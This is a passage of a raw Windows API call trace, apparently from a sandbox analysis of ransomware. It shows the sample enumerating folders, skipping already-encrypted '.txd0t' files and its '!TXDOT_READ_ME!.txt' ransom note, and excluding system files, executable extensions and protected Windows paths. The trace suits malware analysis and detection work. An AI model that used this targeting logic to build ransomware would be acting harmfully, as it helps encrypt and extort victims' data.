hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x587a97d4, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x587a97d4, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x587cfa75, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0128.750] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0128.750] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0128.750] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1046", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1046") returned="C:\\588bce7c90097ed212\\1046" [0128.750] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1046", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1046\\") returned="C:\\588bce7c90097ed212\\1046\\" [0128.750] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1046\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1046\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\1046\\!TXDOT_READ_ME!.txt" [0128.750] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0128.750] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0128.750] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0128.750] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0128.750] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0128.750] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0128.750] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0128.750] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0128.750] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0128.750] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0128.750] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0128.750] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0128.750] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0128.750] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0128.750] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0128.750] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0128.750] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x587a97d4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1063, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf.txd0t", cAlternateFileName="EULART~1.TXD")) returned 1 [0128.750] StrCmpW (psz1="eula.rtf.txd0t", psz2=".") returned 1 [0128.750] StrCmpW (psz1="eula.rtf.txd0t", psz2="..") returned 1 [0128.750] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1046", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1046") returned="C:\\588bce7c90097ed212\\1046" [0128.750] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1046", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1046\\") returned="C:\\588bce7c90097ed212\\1046\\" [0128.750] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1046\\", psz2="eula.rtf.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1046\\eula.rtf.txd0t") returned="C:\\588bce7c90097ed212\\1046\\eula.rtf.txd0t" [0128.750] PathFindExtensionW (pszPath="eula.rtf.txd0t") returned=".txd0t" [0128.750] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.750] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x589e5c0d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x13d62, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml.txd0t", cAlternateFileName="LOCALI~1.TXD")) returned 1 [0128.750] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2=".") returned 1 [0128.750] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2="..") returned 1 [0128.750] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1046", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1046") returned="C:\\588bce7c90097ed212\\1046" [0128.750] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1046", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1046\\") returned="C:\\588bce7c90097ed212\\1046\\" [0128.750] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1046\\", psz2="LocalizedData.xml.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml.txd0t") returned="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml.txd0t" [0128.751] PathFindExtensionW (pszPath="LocalizedData.xml.txd0t") returned=".txd0t" [0128.751] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.751] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0128.751] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0128.751] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0128.751] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1046", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1046") returned="C:\\588bce7c90097ed212\\1046" [0128.751] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1046", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1046\\") returned="C:\\588bce7c90097ed212\\1046\\" [0128.751] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1046\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1046\\SetupResources.dll" [0128.751] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0128.751] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0128.751] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0128.751] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0128.751] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0128.751] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0128.751] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0128.751] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0128.751] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0128.751] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0128.751] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0128.751] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0128.751] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0128.751] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0128.751] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0128.751] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.751] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0128.751] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0128.751] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0128.751] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0128.751] GetProcessHeap () returned 0xe30000 [0128.751] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6874278 | out: hHeap=0xe30000) returned 1 [0128.751] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58baf75f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58baf75f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1049", cAlternateFileName="")) returned 1 [0128.751] StrCmpW (psz1="1049", psz2=".") returned 1 [0128.751] StrCmpW (psz1="1049", psz2="..") returned 1 [0128.752] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.752] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.752] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1049", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1049") returned="C:\\588bce7c90097ed212\\1049" [0128.752] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="\\windows\\system32\\") returned 0x0 [0128.752] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="\\windows\\syswow64\\") returned 0x0 [0128.752] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="\\windows\\system\\") returned 0x0 [0128.752] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="\\windows\\winsxs\\") returned 0x0 [0128.752] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="\\appdata\\roaming\\") returned 0x0 [0128.752] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="\\appdata\\local\\") returned 0x0 [0128.752] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="\\appdata\\locallow\\") returned 0x0 [0128.752] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="\\all users\\microsoft\\") returned 0x0 [0128.752] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="\\inetpub\\logs\\") returned 0x0 [0128.752] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch=":\\boot\\") returned 0x0 [0128.752] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch=":\\perflogs\\") returned 0x0 [0128.752] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch=":\\programdata\\") returned 0x0 [0128.752] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch=":\\drivers\\") returned 0x0 [0128.752] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch=":\\wsus\\") returned 0x0 [0128.752] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch=":\\efstmpwp\\") returned 0x0 [0128.752] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch=":\\$recycle.bin\\") returned 0x0 [0128.752] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="crypt_detect") returned 0x0 [0128.752] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="cryptolocker") returned 0x0 [0128.752] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="ransomware") returned 0x0 [0128.752] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="C:\\WINDOWS") returned 0x0 [0128.752] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="C:\\Program Files (x86)") returned 0x0 [0128.752] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="C:\\Program Files") returned 0x0 [0128.752] GetProcessHeap () returned 0xe30000 [0128.752] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0x6874278 [0128.752] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1049", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1049") returned="C:\\588bce7c90097ed212\\1049" [0128.752] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1049", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1049\\*") returned="C:\\588bce7c90097ed212\\1049\\*" [0128.752] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1049\\*", lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58baf75f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58baf75f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0128.753] StrCmpW (psz1=".", psz2=".") returned 0 [0128.753] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58baf75f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58baf75f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.753] StrCmpW (psz1="..", psz2=".") returned 1 [0128.753] StrCmpW (psz1="..", psz2="..") returned 0 [0128.753] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5881c229, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x5881c229, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58868375, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0128.753] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0128.753] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0128.753] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1049", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1049") returned="C:\\588bce7c90097ed212\\1049" [0128.753] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1049", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1049\\") returned="C:\\588bce7c90097ed212\\1049\\" [0128.753] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1049\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1049\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\1049\\!TXDOT_READ_ME!.txt" [0128.753] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0128.753] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0128.753] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0128.753] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0128.753] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0128.753] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0128.753] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0128.753] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0128.753] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0128.753] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0128.753] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0128.753] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0128.753] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0128.753] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0128.753] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0128.753] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0128.753] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x5881c229, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xd6b8, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf.txd0t", cAlternateFileName="EULART~1.TXD")) returned 1 [0128.753] StrCmpW (psz1="eula.rtf.txd0t", psz2=".") returned 1 [0128.753] StrCmpW (psz1="eula.rtf.txd0t", psz2="..") returned 1 [0128.753] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1049", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1049") returned="C:\\588bce7c90097ed212\\1049" [0128.753] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1049", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1049\\") returned="C:\\588bce7c90097ed212\\1049\\" [0128.753] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1049\\", psz2="eula.rtf.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1049\\eula.rtf.txd0t") returned="C:\\588bce7c90097ed212\\1049\\eula.rtf.txd0t" [0128.753] PathFindExtensionW (pszPath="eula.rtf.txd0t") returned=".txd0t" [0128.753] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.753] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x58baf75f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1404a, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml.txd0t", cAlternateFileName="LOCALI~1.TXD")) returned 1 [0128.754] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2=".") returned 1 [0128.754] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2="..") returned 1 [0128.754] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1049", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1049") returned="C:\\588bce7c90097ed212\\1049" [0128.754] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1049", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1049\\") returned="C:\\588bce7c90097ed212\\1049\\" [0128.754] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1049\\", psz2="LocalizedData.xml.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml.txd0t") returned="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml.txd0t" [0128.754] PathFindExtensionW (pszPath="LocalizedData.xml.txd0t") returned=".txd0t" [0128.754] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.754] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0128.754] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0128.754] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0128.754] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1049", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1049") returned="C:\\588bce7c90097ed212\\1049" [0128.754] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1049", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1049\\") returned="C:\\588bce7c90097ed212\\1049\\" [0128.754] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1049\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1049\\SetupResources.dll" [0128.754] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0128.754] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0128.754] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0128.754] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0128.754] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0128.754] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0128.754] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0128.754] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0128.754] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0128.754] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0128.754] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0128.754] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0128.754] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0128.754] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0128.754] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0128.754] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.754] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0128.754] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0128.754] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0128.754] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0128.755] GetProcessHeap () returned 0xe30000 [0128.755] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6874278 | out: hHeap=0xe30000) returned 1 [0128.755] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x589e5c0d, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x589e5c0d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1053", cAlternateFileName="")) returned 1 [0128.755] StrCmpW (psz1="1053", psz2=".") returned 1 [0128.755] StrCmpW (psz1="1053", psz2="..") returned 1 [0128.755] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.755] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.755] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1053", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1053") returned="C:\\588bce7c90097ed212\\1053" [0128.755] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="\\windows\\system32\\") returned 0x0 [0128.755] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="\\windows\\syswow64\\") returned 0x0 [0128.755] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="\\windows\\system\\") returned 0x0 [0128.755] StrStrIW 